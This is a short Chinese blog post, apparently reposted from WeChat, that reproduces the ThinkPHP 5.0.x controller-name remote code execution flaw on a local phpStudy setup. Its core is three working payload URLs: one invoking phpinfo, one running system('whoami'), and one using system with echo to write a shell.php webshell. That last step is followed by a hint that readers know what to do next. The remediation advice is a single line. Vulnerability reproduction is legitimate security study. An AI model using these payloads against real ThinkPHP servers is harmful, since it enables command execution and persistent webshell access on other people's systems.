thinkphp - 远程执行漏洞的本地复现
2020-03-17 10:57:45 Author: mp.weixin.qq.com(查看原文) 阅读量:294 收藏


0x01 漏洞简介

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell(可以控制服务器)

0x02 环境搭建

Phpstudy:php-5.5.38 Apache

下载存在漏洞版本我下载的版本是thinkphp_5.0.22搭建好以后如图

下载链接:

http://www.thinkphp.cn/donate/download/id/1261.html


0x03 漏洞payload

Phpinfo页面:

  1. http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

执行whoami命令:

  1. http://127.0.0.1/thinkphp_5.0.22/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写shell:

  1. http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php

然后就你们就知道该怎么做了吧。

0x04 漏洞修复

建议升级到最新版本

推荐文章++++

*thinkphp6 任意文件创建漏洞复现

*ThinkPHP5.x.x各版本实战环境getshell

*Thinkphp5.x 全版本通杀漏洞分析


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460218&idx=3&sn=eb7b77715d604e014abaa98027b9399e&chksm=83bbb5deb4cc3cc824803337cdc51543e881d2ff5ad1b45e909acaa849530606d3c271d2faf8#rd
如有侵权请联系:admin#unsafe.sh